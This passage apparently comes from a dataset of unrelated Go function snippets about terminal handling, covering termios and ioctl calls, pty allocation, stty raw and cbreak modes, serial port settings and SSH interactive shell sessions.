\"xterm-256color\"\n\t}\n\tif err := session.RequestPty(term, h, w, modes); err != nil {\n\t\treturn fmt.Errorf(\"session xterm: %s\", err)\n\t}\n\n\tsession.Stdout = os.Stdout\n\tsession.Stderr = os.Stderr\n\tsession.Stdin = os.Stdin\n\n\tif err := session.Shell(); err != nil {\n\t\treturn fmt.Errorf(\"session shell: %s\", err)\n\t}\n\n\tif err := session.Wait(); err != nil {\n\t\tif e, ok := err.(*ssh.ExitError); ok {\n\t\t\tswitch e.ExitStatus() {\n\t\t\tcase 130:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t\treturn fmt.Errorf(\"ssh: %s\", err)\n\t}\n\treturn nil\n}", "func tcsetattr(fd int, termios *syscall.Termios) (err error) {\n\tr, _, errno := syscall.Syscall(uintptr(syscall.SYS_IOCTL),\n\t\tuintptr(fd), uintptr(syscall.TCSETS), uintptr(unsafe.Pointer(termios)))\n\tif errno != 0 {\n\t\terr = errno\n\t\treturn\n\t}\n\tif r != 0 {\n\t\terr = fmt.Errorf(\"tcsetattr failed %v\", r)\n\t}\n\treturn\n}", "func restoreTerminal() {\n\tif !stdoutIsTerminal() {\n\t\treturn\n\t}\n\n\tfd := int(os.Stdout.Fd())\n\tstate, err := terminal.GetState(fd)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"unable to get terminal state: %v\\n\", err)\n\t\treturn\n\t}\n\n\tAddCleanupHandler(func() error {\n\t\t// Restoring the terminal configuration while restic runs in the\n\t\t// background, causes restic to get stopped on unix systems with\n\t\t// a SIGTTOU signal. Thus only restore the terminal settings if\n\t\t// they might have been modified, which is the case while reading\n\t\t// a password.\n\t\tif !isReadingPassword {\n\t\t\treturn nil\n\t\t}\n\t\terr := checkErrno(terminal.Restore(fd, state))\n\t\tif err != nil {\n\t\t\tfmt.Fprintf(os.Stderr, \"unable to restore terminal state: %v\\n\", err)\n\t\t}\n\t\treturn err\n\t})\n}", "func simpleMode(tty *TTY, flags settings, finishNotifyChan chan error) {\n\tbuf, n, err := prompt.AskForPassword(tty.file, tty.num, flags.simple)\n\tif err != nil {\n\t\tfinishNotifyChan <- err\n\t\treturn\n\t}\n\t// In case of signal this will be not executed, but memguard.DestroyAll\n\t// from main will so we don't care much about it.\n\tdefer buf.Destroy()\n\n\tfmt.Println(string(buf.Buffer()[:n]))\n\n\ttty.file.WriteString(terminal.TermClear)\n\ttty.file.WriteString(terminal.TermReset)\n\n\tfinishNotifyChan <- nil\n}", "func (tio *termios) apply(fd uintptr) error {\n\t// TODO(krasin): may be also support TCSETSW\n\tif err := ioctl(fd, TCSETSF, tio); err != nil {\n\t\treturn err\n\t}\n\t//if err := fcntl(fd, syscall.F_SETFL, 0); err != nil {\n\t//\treturn err\n\t//}\n\treturn nil\n}", "func NewTerminal(command string, logger *zap.Logger, onData func(string), onClose func()) (Terminal, error) {\n\ttLogger := logger.With(zap.String(\"component\", \"terminal\"))\n\ttLogger.Info(\"Starting new session.\")\n\n\tcmd := exec.Command(command)\n\ttty, err := pty.Start(cmd)\n\tif err != nil {\n\t\treturn Terminal{}, err\n\t}\n\n\tterm := Terminal{\n\t\ttty: tty,\n\t\tcmd: cmd,\n\t\tlogger: tLogger,\n\t\tmutex: &sync.Mutex{},\n\t}\n\t// Spin-up watcher-service\n\tgo func() {\n\t\ttLogger.Debug(\"Starting watcher-service\")\n\t\tfor {\n\t\t\tbuffer := make([]byte, 1024) // In bytes [ buffer-size ]\n\t\t\treadLength, err := term.tty.Read(buffer)\n\t\t\tif err != nil {\n\t\t\t\ttLogger.Debug(\"Failed to read from terminal\", zap.Error(err))\n\t\t\t\tterm.Close()\n\t\t\t\tonClose()\n\t\t\t\treturn\n\t\t\t}\n\t\t\tpayload := string(buffer[:readLength])\n\t\t\ttLogger.Debug(\"Sending message burst\", zap.Int(\"bytes\", readLength))\n\t\t\tonData(payload)\n\t\t}\n\t}()\n\treturn term, nil\n}", "func (s *shellExecutor) ExecuteTTY(script string) error {\n\tworkingDirectory := s.ctx.AnchorFilesPath()\n\tsubstituteEnvVarScript := expandScriptEnvVars(script)\n\tc := exec.Command(string(s.shellType), \"-c\", substituteEnvVarScript)\n\tc.Dir = workingDirectory\n\n\t// Start the command with a pty\n\tptmx, err := pty.Start(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// Make sure to close the pty at the end\n\tdefer func() { _ = ptmx.Close() }() // Best effort\n\n\t// Handle pty size\n\tch := make(chan os.Signal, 1)\n\tsignal.Notify(ch, syscall.SIGWINCH)\n\tgo func() {\n\t\tfor range ch {\n\t\t\tif err = pty.InheritSize(os.Stdin, ptmx); err != nil {\n\t\t\t\tlogger.Errorf(\"error resizing pty: %s\", err)\n\t\t\t}\n\t\t}\n\t}()\n\tch <- syscall.SIGWINCH // Initial resize\n\tdefer func() { signal.Stop(ch); close(ch) }() // Cleanup signals when done\n\n\t// Set stdin in raw mode\n\toldState, err := term.MakeRaw(int(os.Stdin.Fd()))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer func() { _ = term.Restore(int(os.Stdin.Fd()), oldState) }() // Best effort\n\n\t// Copy stdin to the pty and the pty to stdout\n\t// NOTE: The goroutine will keep reading until the next keystroke before returning\n\tgo func() { _, _ = io.Copy(ptmx, os.Stdin) }()\n\t_, _ = io.Copy(os.Stdout, ptmx)\n\n\treturn nil\n}", "func SetAndProtectTerm() {\n\t// disable input buffering\n\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"cbreak\", \"min\", \"1\").Run()\n\t// do not display entered characters on the screen\n\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"-echo\").Run()\n\t// restore the echoing state when exiting\n\tdefer exec.Command(\"stty\", \"-F\", \"/dev/tty\", \"echo\").Run()\n\n\t// ensure we use echo even on sigterm/ctrl+c\n\tc := make(chan os.Signal, 1)\n\tsignal.Notify(c, os.Interrupt, syscall.SIGTERM)\n\tgo func() {\n\t\t<-c\n\t\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"echo\").Run()\n\t\tos.Exit(1)\n\t}()\n}", "func ResetTerminal(fd FileDescriptor, state *TerminalState) error {\n\tvar s *mobyterm.State\n\tif state != nil {\n\t\ts = &state.state\n\t}\n\treturn mobyterm.RestoreTerminal(fd, s)\n}", "func SetColorIfTerminal() {\n\tif IsTerminal() {\n\t\tSetColorOutput()\n\t}\n}", "func makeTermios2(options OpenOptions) (*termios2, error) {\n\n\t// Sanity check inter-character timeout and minimum read size options.\n\t// See serial.go for more information on vtime/vmin -- these only work in non-canonical mode\n\tvtime := uint(round(float64(options.InterCharacterTimeout)/100.0) * 100)\n\tvmin := options.MinimumReadSize\n\n\tif vmin == 0 && vtime < 100 {\n\t\treturn nil, errors.New(\"invalid values for InterCharacterTimeout and MinimumReadSize\")\n\t}\n\n\tif vtime > 25500 {\n\t\treturn nil, errors.New(\"invalid value for InterCharacterTimeout\")\n\t}\n\n\tccOpts := [nccs]cc_t{}\n\tccOpts[unix.VTIME] = cc_t(vtime / 100)\n\tccOpts[unix.VMIN] = cc_t(vmin)\n\n\t// We set the flags for CLOCAL, CREAD and BOTHER\n\t// CLOCAL : ignore modem control lines\n\t// CREAD : enable receiver\n\t// BOTHER : allow generic BAUDRATE values\n\tt2 := &termios2{\n\t\tc_cflag: unix.CLOCAL | unix.CREAD | unix.BOTHER,\n\t\tc_ispeed: speed_t(options.BaudRate),\n\t\tc_ospeed: speed_t(options.BaudRate),\n\t\tc_cc: ccOpts,\n\t}\n\n\t// Un-set the ICANON mode to allow non-canonical mode\n\t// See: https://www.gnu.org/software/libc/manual/html_node/Canonical-or-Not.html\n\tif !options.CanonicalMode {\n\t\tt2.c_lflag &= ^tcflag_t(unix.ICANON)\n\t}\n\n\t// Allow for setting 1 or 2 stop bits\n\tswitch options.StopBits {\n\tcase 1:\n\tcase 2:\n\t\tt2.c_cflag |= unix.CSTOPB\n\n\tdefault:\n\t\treturn nil, errors.New(\"invalid setting for StopBits\")\n\t}\n\n\t// If odd or even, enable parity generation (PARENB) and determine the type\n\tswitch options.ParityMode {\n\tcase Parity_None:\n\tcase Parity_Odd:\n\t\tt2.c_cflag |= unix.PARENB\n\t\tt2.c_cflag |= unix.PARODD\n\n\tcase Parity_Even:\n\t\tt2.c_cflag |= unix.PARENB\n\n\tdefault:\n\t\treturn nil, errors.New(\"invalid setting for ParityMode\")\n\t}\n\n\t// Choose the databits per frame\n\tswitch options.DataBits {\n\tcase 5:\n\t\tt2.c_cflag |= unix.CS5\n\tcase 6:\n\t\tt2.c_cflag |= unix.CS6\n\tcase 7:\n\t\tt2.c_cflag |= unix.CS7\n\tcase 8:\n\t\tt2.c_cflag |= unix.CS8\n\tdefault:\n\t\treturn nil, errors.New(\"invalid setting for DataBits\")\n\t}\n\n\treturn t2, nil\n}", "func (p *port) backupTermios() {\n\toldTermios := &syscall.Termios{}\n\tif err := tcgetattr(int(p.file.Fd()), oldTermios); err != nil {\n\t\t// Warning only.\n\t\tlog.Printf(\"serial: could not get setting: %v\\n\", err)\n\t\treturn\n\t}\n\t// Will be reloaded when closing.\n\tp.oldTermios = oldTermios\n}", "func (conn *Conn) Raw(rawline string) {\n\t// Avoid command injection by enforcing one command per line.\n\tconn.out <- cutNewLines(rawline)\n}", "func NewTerminal(input io.Reader, display io.Writer, computer io.ReadWriter) *Terminal {\n\treturn &Terminal{inputDevice: input, displayDevice: display, computingDevice: computer}\n}", "func (p *Port) SetRTS(state bool) error {\n\tvar command int\n\tflag := unix.TIOCM_RTS\n\tif state {\n\t\tcommand = unix.TIOCMBIS\n\t} else {\n\t\tcommand = unix.TIOCMBIC\n\t}\n\terr := ioctl(command, p.fd, uintptr(unsafe.Pointer(&flag)))\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func renderToTerminal(output string) {\n\tswitch render_interface {\n\tcase unix:\n\t\tfmt.Println(\"\\033[2J\")\n\t\tfmt.Println(output)\n\tcase playground:\n\t\tfmt.Printf(\"\\x0c %s\", output)\n\t}\n\ttime.Sleep(delay_time * time.Millisecond)\n}", "func (s *ShellSession) disableEchoAndInputBuffering() {\n\tgetState(&s.originalSttyState)\n\tsetState(bytes.NewBufferString(\"cbreak\"))\n\tsetState(bytes.NewBufferString(\"-echo\"))\n}", "func (w *VT100Writer) RestoreCursor() {\n\t//fmt.Fprintln(os.Stderr, \"\\x1b[33;1mRCP\\x1b[m\")\n\tw.WriteRaw([]byte{0x1b, '[', 'u'})\n}", "func NewPty() (Console, string, error) {\n\treturn nil, \"\", ErrNotImplemented\n}", "func (s *commonStream) RestoreTerminal() {\n\tif s.state != nil {\n\t\t_ = term.RestoreTerminal(s.fd, s.state)\n\t}\n}", "func cleanup() {\n\tcookedTerm := exec.Command(\"stty\", \"-cbreak\", \"echo\")\n\tcookedTerm.Stdin = os.Stdin\n\n\terr := cookedTerm.Run()\n\tif err != nil {\n\t\tlog.Fatalln(\"unable to restore cooked terminal mode:\", err)\n\t}\n}", "func newTtyIO(ctx context.Context, ns, id, stdin, stdout, stderr string, console bool) (*ttyIO, error) {\n\tvar err error\n\tvar io IO\n\n\traw := &stdio{\n\t\tStdin: stdin,\n\t\tStdout: stdout,\n\t\tStderr: stderr,\n\t\tConsole: console,\n\t}\n\n\turi, err := url.Parse(stdout)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to parse stdout uri: %w\", err)\n\t}\n\n\tif uri.Scheme == \"\" {\n\t\turi.Scheme = \"fifo\"\n\t}\n\n\tswitch uri.Scheme {\n\tcase shimLogPluginFifo:\n\t\tio, err = newPipeIO(ctx, raw)\n\tcase shimLogPluginBinary:\n\t\tio, err = newBinaryIO(ctx, ns, id, uri)\n\tcase shimLogPluginFile:\n\t\tio, err = newFileIO(ctx, raw, uri)\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"unknown STDIO scheme %s\", uri.Scheme)\n\t}\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to creat io stream: %w\", err)\n\t}\n\n\treturn &ttyIO{\n\t\tio: io,\n\t\traw: raw,\n\t}, nil\n}", "func newTerminal(\n\tsess ssh.Channel,\n\tpayload []byte,\n) (*terminal.Terminal, error) {\n\tvar (\n\t\twidth uint32\n\t\theight uint32\n\t\terr error\n\t)\n\t/* New terminal */\n\tterm := terminal.NewTerminal(sess, \"\")\n\tterm.SetPrompt(Prompt(term))\n\t/* Ignore terminal type */\n\t_, payload, err = stringFromPayload(payload)\n\tif nil != err {\n\t\treturn nil, err\n\t}\n\t/* Terminal sizes in characters */\n\twidth, payload, err = u32FromPayload(payload)\n\tif nil != err {\n\t\treturn nil, err\n\t}\n\theight, payload, err = u32FromPayload(payload)\n\tif nil != err {\n\t\treturn nil, err\n\t}\n\t/* Make the terminal, set its size */\n\tif 0 != width && 0 != height {\n\t\tterm.SetSize(int(width), int(height))\n\t}\n\treturn term, nil\n}", "func (term *Terminal) setup(buf *Buffer, in io.Reader) (*bufio.Reader, error) {\n\tcols, _, err := TerminalSize(buf.Out)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbuf.Cols = cols\n\tinput := bufio.NewReader(in)\n\n\terr = buf.Refresh()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn input, nil\n}", "func (client *NativeClient) OutputWithPty(command string) (string, error) {\n\tsession, err := client.session(command)\n\tif err != nil {\n\t\treturn \"\", nil\n\t}\n\n\tfd := int(os.Stdin.Fd())\n\n\ttermWidth, termHeight, err := terminal.GetSize(fd)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tmodes := ssh.TerminalModes{\n\t\tssh.ECHO: 0,\n\t\tssh.TTY_OP_ISPEED: 14400,\n\t\tssh.TTY_OP_OSPEED: 14400,\n\t}\n\n\t// request tty -- fixes error with hosts that use\n\t// \"Defaults requiretty\" in /etc/sudoers - I'm looking at you RedHat\n\tif err := session.RequestPty(\"xterm\", termHeight, termWidth, modes); err != nil {\n\t\treturn \"\", err\n\t}\n\n\toutput, err := session.CombinedOutput(command)\n\tdefer session.Close()\n\n\treturn string(bytes.TrimSpace(output)), wrapError(err)\n}", "func (rcr *RawRuneReader) Restore() error {\n\treturn terminal.Restore(syscall.Stdin, rcr.state)\n}", "func (ghost *Ghost) SetTtyDevice(ttyDevice string) *Ghost {\n\tghost.ttyDevice = ttyDevice\n\treturn ghost\n}", "func IsTerminal(fd uintptr) bool {\n\tvar trap uintptr // SYS_IOCTL\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"amd64\":\n\t\t\ttrap = 16\n\t\tcase \"arm64\":\n\t\t\ttrap = 29\n\t\tcase \"mips\", \"mipsle\":\n\t\t\ttrap = 4054\n\t\tcase \"mips64\", \"mips64le\":\n\t\t\ttrap = 5015\n\t\tdefault:\n\t\t\ttrap = 54\n\t\t}\n\tdefault:\n\t\ttrap = 54\n\t}\n\n\tvar req uintptr // TIOCGETA\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"ppc64\", \"ppc64le\":\n\t\t\treq = 0x402c7413\n\t\tcase \"mips\", \"mipsle\", \"mips64\", \"mips64le\":\n\t\t\treq = 0x540d\n\t\tdefault:\n\t\t\treq = 0x5401\n\t\t}\n\tcase \"darwin\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"amd64\", \"arm64\":\n\t\t\treq = 0x40487413\n\t\tdefault:\n\t\t\treq = 0x402c7413\n\t\t}\n\tdefault:\n\t\treq = 0x402c7413\n\t}\n\n\tvar termios [256]byte\n\t_, _, err := syscall.Syscall6(trap, fd, req, uintptr(unsafe.Pointer(&termios[0])), 0, 0, 0)\n\treturn err == 0\n}", "func initialize() {\n\tcbTerm := exec.Command(\"stty\", \"cbreak\", \"-echo\")\n\tcbTerm.Stdin = os.Stdin\n\n\terr := cbTerm.Run()\n\tif err != nil {\n\t\tlog.Fatalln(\"unable to activate cbreak terminal mode:\", err)\n\t}\n}", "func (t *Termios) SetInSpeed(s int) {\n\t//\tt.Iflag = t.Iflag&^CBAUD | uint32(s)&CBAUD\n}", "func tcgetattr(fd int, termios *syscall.Termios) (err error) {\n\tr, _, errno := syscall.Syscall(uintptr(syscall.SYS_IOCTL),\n\t\tuintptr(fd), uintptr(syscall.TCGETS), uintptr(unsafe.Pointer(termios)))\n\tif errno != 0 {\n\t\terr = errno\n\t\treturn\n\t}\n\tif r != 0 {\n\t\terr = fmt.Errorf(\"tcgetattr failed %v\", r)\n\t\treturn\n\t}\n\treturn\n}", "func Raw(cmd string, options ...types.Option) (string, error) {\n\treturn command(context.Background(), cmd, options...)\n}", "func (c *osExecCommand) SetStdin(r io.Reader) {\n\t// If unset, have the command use the same input as the terminal.\n\tif c.Stdin == nil {\n\t\tc.Stdin = r\n\t}\n}", "func customStdio() terminal.StdioInterface {\n\treturn terminal.NewCustomStdio(os.Stdin, os.Stderr, os.Stderr)\n}", "func NewTerminal(in *os.File, out *os.File) *Terminal {\n\treturn &Terminal{\n\t\tconsole: false,\n\t\tin: in,\n\t\tout: out,\n\t}\n}", "func restoreConsoleMode() {\n\tfd := os.Stderr.Fd()\n\twindows.SetConsoleMode(windows.Handle(fd), consoleMode)\n}", "func New() (*RawRuneReader, error) {\n\n\tstate, err := terminal.MakeRaw(syscall.Stdin)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trcr := RawRuneReader{}\n\trcr.state = state\n\trcr.in = bufio.NewReader(os.Stdin)\n\n\treturn &rcr, nil\n}", "func shell(user *internal.User, connection ssh.Channel, requests <-chan *ssh.Request, log logger.Logger) {\n\n\tif user.Pty == nil {\n\t\tfmt.Fprintf(connection, \"Shell without pty not allowed.\")\n\t\treturn\n\t}\n\n\tpath := \"\"\n\tif len(shells) != 0 {\n\t\tpath = shells[0]\n\t}\n\n\t// Fire up a shell for this session\n\tshell := exec.Command(path)\n\tshell.Env = os.Environ()\n\tshell.Env = append(shell.Env, \"TERM=\"+user.Pty.Term)\n\n\tclose := func() {\n\t\tconnection.Close()\n\t\tif shell.Process != nil {\n\t\t\terr := shell.Process.Kill()\n\t\t\tif err != nil {\n\t\t\t\tlog.Warning(\"Failed to kill shell(%s)\", err)\n\t\t\t}\n\t\t}\n\n\t\tlog.Info(\"Session closed\")\n\t}\n\n\t// Allocate a terminal for this channel\n\tlog.Info(\"Creating pty...\")\n\tshellf, err := pty.Start(shell)\n\tif err != nil {\n\t\tlog.Info(\"Could not start pty (%s)\", err)\n\t\tclose()\n\t\treturn\n\t}\n\n\terr = pty.Setsize(shellf, &pty.Winsize{Cols: uint16(user.Pty.Columns), Rows: uint16(user.Pty.Rows)})\n\tif err != nil {\n\t\tlog.Error(\"Unable to set terminal size %s\", err)\n\t\tfmt.Fprintf(connection, \"Unable to set term size\")\n\t\treturn\n\t}\n\n\t//pipe session to bash and visa-versa\n\tvar once sync.Once\n\tgo func() {\n\t\tio.Copy(connection, shellf)\n\t\tonce.Do(close)\n\t}()\n\tgo func() {\n\t\tio.Copy(shellf, connection)\n\t\tonce.Do(close)\n\t}()\n\tdefer once.Do(close)\n\n\tfor req := range requests {\n\t\tswitch req.Type {\n\n\t\tcase \"window-change\":\n\t\t\tw, h := internal.ParseDims(req.Payload)\n\t\t\terr = pty.Setsize(shellf, &pty.Winsize{Cols: uint16(w), Rows: uint16(h)})\n\t\t\tif err != nil {\n\t\t\t\tlog.Warning(\"Unable to set terminal size: %s\", err)\n\t\t\t}\n\n\t\tdefault:\n\t\t\tlog.Warning(\"Unknown request %s\", req.Type)\n\t\t\tif req.WantReply {\n\t\t\t\treq.Reply(false, nil)\n\t\t\t}\n\t\t}\n\t}\n\n}", "func NewScreen() *Screen {\n\tt, err := term.Open(\"/dev/tty\", term.Speed(19200))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\terr = term.RawMode(t)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\treturn &Screen{Terminal: t, ScreenCursor: Cursor{terminal: t}, running: true, InputManager: input.NewManager(t)}\n}", "func query(fd uintptr) (*termios, error) {\n\ttio := new(termios)\n\tif err := ioctl(fd, TCGETS, tio); err != nil {\n\t\treturn nil, err\n\t}\n\treturn tio, nil\n}", "func IsTerminal(fd int) bool {\n\t_, err := unix.IoctlGetTermios(fd, ioctlReadTermios)\n\treturn err == nil\n}", "func prepareTerminal() (reset func()) {\n\treturn func() {}\n}", "func reset() {\n\tterm.Sync()\n}", "func (c *CursesConfig) SetCommandMode(mode tileslib.CommandModeType) {\n\tc.base.CommandMode = mode\n}", "func (c *CmdReal) SetStdin(stdin io.Reader) {\n\tc.cmd.Stdin = stdin\n}", "func (c *Config) Shell(inReader io.Reader, outWriter, errWriter io.Writer) error {\n\terr := c.setClient()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer c.Close()\n\n\tsession, err := c.client.NewSession()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer session.Close()\n\n\tsession.Stdout = ansicolor.NewAnsiColorWriter(outWriter)\n\tsession.Stderr = ansicolor.NewAnsiColorWriter(errWriter)\n\tsession.Stdin = inReader\n\t// in, _ := session.StdinPipe()\n\n\tmodes := ssh.TerminalModes{\n\t\t// ssh.ECHO: 0, // Disable echoing\n\t\t// ssh.IGNCR: 1, // Ignore CR on input\n\t\tssh.ECHO: 1, // Print what I type\n\t\tssh.ECHOCTL: 0, // Don't print control chars\n\t\tssh.TTY_OP_ISPEED: 115200, // baud in\n\t\tssh.TTY_OP_OSPEED: 115200, // baud out\n\t}\n\n\th, w := 80, 40\n\tvar termFD int\n\tvar ok bool\n\tif termFD, ok = isTerminal(inReader); ok {\n\t\tw, h, _ = terminal.GetSize(termFD)\n\t}\n\n\ttermState, _ := terminal.MakeRaw(termFD)\n\tdefer terminal.Restore(termFD, termState)\n\n\t// Request pseudo terminal\n\t// if err := session.RequestPty(\"xterm\", h, w, modes); err != nil {\n\t// if err := session.RequestPty(\"xterm-256color\", h, w, modes); err != nil {\n\t// if err := session.RequestPty(\"vt220\", h, w, modes); err != nil {\n\t// if err := session.RequestPty(\"vt100\", h, w, modes); err != nil {\n\tif err := session.RequestPty(\"xterm-256color\", h, w, modes); err != nil {\n\t\treturn fmt.Errorf(\"request for pseudo terminal failed: %s\", err)\n\t}\n\n\t// Start remote shell\n\tif err := session.Shell(); err != nil {\n\t\treturn fmt.Errorf(\"failed to start shell: %s\", err)\n\t}\n\n\treturn session.Wait()\n\n\t// // Handle control + C\n\t// ch := make(chan os.Signal, 1)\n\t// signal.Notify(ch, os.Interrupt)\n\t// go func() {\n\t// \tfor {\n\t// \t\t<-ch\n\t// \t\tfmt.Println(\"^C\")\n\t// \t\tfmt.Fprint(in, \"\\n\")\n\t// \t\t//fmt.Fprint(in, '\\t')\n\t// \t}\n\t// }()\n\n\t// // Accepting commands\n\t// for {\n\t// \treader := bufio.NewReader(i)\n\t// \tstr, _ := reader.ReadString('\\n')\n\t// \tfmt.Fprint(in, str)\n\t// }\n}", "func (c *Command) SetStandardIO(in io.Reader, out, err io.Writer) {\n\tc.cmd.Stdin = in\n\tc.cmd.Stdout = out\n\tc.cmd.Stderr = err\n}", "func IsTty(fd uintptr) bool {\n\tvar termios Termios\n\t_, _, err := syscall.Syscall(syscall.SYS_IOCTL,\n\t\tfd,\n\t\tuintptr(syscall.TCGETS),\n\t\tuintptr(unsafe.Pointer(&termios)))\n\treturn err == 0\n}", "func EnableVirtalTerminalWindows() error {\n\treturn nil\n}", "func (client *NativeClient) Shell(args ...string) error {\n\tvar (\n\t\ttermWidth, termHeight = 80, 24\n\t)\n\tconn, err := ssh.Dial(\"tcp\", fmt.Sprintf(\"%s:%d\", client.Hostname, client.Port), &client.Config)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsession, err := conn.NewSession()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdefer session.Close()\n\n\tsession.Stdout = os.Stdout\n\tsession.Stderr = os.Stderr\n\tsession.Stdin = os.Stdin\n\n\tmodes := ssh.TerminalModes{\n\t\tssh.ECHO: 1,\n\t}\n\n\tfd := os.Stdin.Fd()\n\n\tif term.IsTerminal(fd) {\n\t\toldState, err := term.MakeRaw(fd)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tdefer term.RestoreTerminal(fd, oldState)\n\n\t\twinsize, err := term.GetWinsize(fd)\n\t\tif err == nil {\n\t\t\ttermWidth = int(winsize.Width)\n\t\t\ttermHeight = int(winsize.Height)\n\t\t}\n\t}\n\n\tif err := session.RequestPty(\"xterm\", termHeight, termWidth, modes); err != nil {\n\t\treturn err\n\t}\n\n\tif len(args) == 0 {\n\t\tif err := session.Shell(); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// monitor for sigwinch\n\t\tgo monWinCh(session, os.Stdout.Fd())\n\n\t\tsession.Wait()\n\t} else {\n\t\tsession.Run(strings.Join(args, \" \"))\n\t}\n\n\treturn nil\n}", "func (v defaultTTYImpl) Isatty() bool {\n\tif config.MockNoTTY() {\n\t\treturn false\n\t}\n\tif isatty.IsTerminal(os.Stdin.Fd()) &&\n\t\tisatty.IsTerminal(os.Stdout.Fd()) {\n\t\treturn true\n\t} else if isatty.IsCygwinTerminal(os.Stdin.Fd()) &&\n\t\tisatty.IsCygwinTerminal(os.Stdout.Fd()) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (t *Terminal) Run() error {\n\tend := make(chan int)\n\tvar err error\n\tgo func() {\n\t\t_, err = io.Copy(t.displayDevice, t.computingDevice)\n\t\tend <- 1\n\t}()\n\n\tgo func() {\n\t\t_, err = io.Copy(t.computingDevice, t.inputDevice)\n\t\tend <- 1\n\t}()\n\t<-end\n\treturn err\n}", "func NewRaw(id, netID string, args ...string) *CmdMsg {\n\tcmd := NewCmd(id, \"raw\", args...)\n\tcmd.Network.Init(netID, \"net\")\n\treturn cmd\n}", "func IsTerminal(fd uintptr) bool {\r\n\treturn false\r\n}", "func setState(state *bytes.Buffer) error {\n\tcmd := exec.Command(\"stty\", state.String())\n\tcmd.Stdin = os.Stdin\n\tcmd.Stdout = os.Stdout\n\treturn cmd.Run()\n}", "func (sshConfig *SSHConfig) rawRun(cmd string) ([]byte, error) {\n\tsession, _, err := sshConfig.OpenSession()\n\tif err != nil {\n\t\treturn []byte{}, err\n\t}\n\n\tsshConfig.session = nil // remove copy of the session\n\tdefer session.Close()\n\n\tvar b bytes.Buffer\n\tsession.Stdout = &b // get output\n\terr = session.Run(cmd)\n\treturn b.Bytes(), err\n}", "func (s *Screen) ResetStyle() {\n\tfmt.Fprint(s.Terminal, \"\\x1b[0m\")\n}", "func initTerminalWriter() *uilive.Writer {\n\twriter := uilive.New()\n\twriter.RefreshInterval = time.Second / 60\n\twriter.Start() // start listening for updates and render\n\treturn writer\n}", "func Isatty() bool {\n\treturn CapTTY.Isatty()\n}", "func TerminalEcho(fd uintptr, echo bool) error {\n\ttermios := &syscall.Termios{}\n\tif err := tcget(fd, termios); err != nil {\n\t\treturn err\n\t}\n\n\tif echo {\n\t\ttermios.Lflag |= syscall.ECHO\n\t} else {\n\t\ttermios.Lflag &^= syscall.ECHO\n\t}\n\n\treturn tcset(fd, termios)\n}", "func NewThrottleTerminal(period time.Duration) *ThrottleTerminal {\n\tt := &ThrottleTerminal{\n\t\tlastStatus: time.Now(),\n\t\tperiod: period,\n\t\tstartTime: time.Now(),\n\t}\n\tt.Len()\n\treturn t\n}", "func IsTerminal(fd int) bool {\n\tvar termios syscall.Termios\n\t_, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlReadTermios, uintptr(unsafe.Pointer(&termios)), 0, 0, 0)\n\treturn err == 0\n}", "func SetSudoInterpreter(interpreter string) {\n\tsudoInterpreter = interpreter\n}", "func IsTerminal() bool {\n\treturn isTerminal\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func TestGetStdTerminal(t *testing.T) {\n\tif !PTYSupport {\n\t\tt.Skip(\"OS not supported\")\n\t}\n\n\tif os.Getenv(\"BE_STDTERM\") == \"1\" {\n\t\tCheckIfTerminal()\n\t\treturn\n\t}\n\n\tt.Run(\"GetStdTerminal on non-terminal\", func(t *testing.T) {\n\t\tcmd := exec.Command(os.Args[0], \"-test.run=TestGetStdTerminal\")\n\t\tcmd.Env = append(os.Environ(), \"BE_STDTERM=1\")\n\t\terr := cmd.Run()\n\t\tif e, ok := err.(*exec.ExitError); ok && e.ProcessState.ExitCode() == 2 { // 2 === it's not a terminal\n\t\t\treturn\n\t\t}\n\t\tt.Fatalf(\"GetStdTerminal(): expected status 2 but got %v\", err)\n\t})\n\n\tt.Run(\"do not run on stdin\", func(t *testing.T) {\n\t\tcmd := exec.Command(os.Args[0], \"-test.run=TestGetStdTerminal\")\n\t\tcmd.Env = append(os.Environ(), \"BE_STDTERM=1\")\n\t\tpty, err := ExecTerminal(cmd)\n\t\tif err != nil {\n\t\t\tt.Fatal(\"ExecTerminal(): returned error\")\n\t\t}\n\t\tdefer pty.Close()\n\n\t\terr = cmd.Wait()\n\t\tif err == nil { // 0 === it's a terminal\n\t\t\treturn\n\t\t}\n\t\tt.Fatalf(\"GetStdTerminal(): expected status 0 but got %v\", err)\n\t})\n}", "func StartTerminal(\n\tctx devspacecontext.Context,\n\tdevContainer *latest.DevContainer,\n\tselector targetselector.TargetSelector,\n\tstdout io.Writer,\n\tstderr io.Writer,\n\tstdin io.Reader,\n\tparent *tomb.Tomb,\n) (err error) {\n\t// restart on error\n\tdefer func() {\n\t\tif err != nil {\n\t\t\tif ctx.IsDone() 